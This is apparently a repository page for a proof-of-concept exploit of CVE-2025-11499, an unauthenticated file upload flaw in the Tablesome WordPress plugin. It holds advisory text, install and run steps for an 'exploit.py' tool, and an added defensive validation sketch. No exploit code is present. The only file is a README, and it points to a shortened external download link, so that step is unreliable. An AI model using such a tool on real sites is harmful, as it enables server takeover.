CVE-2025-11499 PoC — Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File

Associated Vulnerability
Title: Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File Upload (CVE-2025-11499)
Description: The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images, and the workflow trigger is created.
Readme
# Arbitrary File Upload Vulnerability in the Tablesome Table Plugin for WordPress (CVE-2025-11499)

## 🌟 Description

The Tablesome Table plugin for WordPress is susceptible to an arbitrary file upload vulnerability due to insufficient file type validation in the set_featured_image_from_external_url() function.
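
An added example, not code from the plugin or from this repository: a sketch of the kind of file type validation the description says is missing, applied to a file fetched from an external URL before it is stored. The function names, the allowlist and the sample URLs are assumptions made for illustration; the plugin itself is PHP, and Python is used here only so the check runs stand-alone.

```python
# Added illustration (not the plugin's code): validate a remotely fetched
# "featured image" before it is written to the uploads directory.
import os
from urllib.parse import urlparse

# Magic-byte signatures for the only image types this sketch accepts.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_ALIASES = {"jpeg": "jpg"}


def sniff_image_type(data: bytes):
    """Return the canonical extension matching the leading bytes, or None."""
    for ext, magics in SIGNATURES.items():
        if any(data.startswith(m) for m in magics):
            return ext
    return None


def safe_featured_image_name(url: str, data: bytes):
    """Return a filename that is safe to store, or None to reject the file."""
    base = os.path.basename(urlparse(url).path)
    stem, _, ext = base.rpartition(".")
    ext = EXT_ALIASES.get(ext.lower(), ext.lower())
    sniffed = sniff_image_type(data)
    # Reject unknown content, and reject a claimed extension that disagrees with it.
    if sniffed is None or ext != sniffed:
        return None
    # The stored name always ends in the sniffed image extension and the stem
    # loses its dots, so "a.php.png" cannot keep an inner ".php".
    clean = "".join(c for c in stem if c.isalnum() or c in "-_") or "image"
    return f"{clean}.{sniffed}"


# Constructed sample inputs (hypothetical URLs, minimal byte strings).
SAMPLES = [
    ("https://files.example/photo.JPEG", b"\xff\xd8\xff\xe0" + b"\x00" * 8),
    ("https://files.example/a.php", b"<?php /* constructed */ ?>"),
    ("https://files.example/a.php.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ("https://files.example/x.png", b"<?php /* constructed */ ?>"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, "->", safe_featured_image_name(url, body))
```

Signature sniffing alone does not prove a file is a harmless image, which is why the stored name is rebuilt from the sniffed type instead of being taken from the URL.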

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://tinyurl.com/4nybda6j)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2025-11499
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

This flaw exists across all versions up to and including 1.1.32, enabling unauthenticated attackers to upload arbitrary files to the server. The vulnerability poses a significant risk, particularly in configurations where unauthenticated users can add featured images, where it can lead to remote code execution.


### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (Critical)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low

## 🛡 Disclaimer

Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.

File Snapshot

[4.0K] /data/pocs/14bc7c6c1067dfafb395da85f39592983bf2a6c9
└── [1.4K] README.md

0 directories, 1 file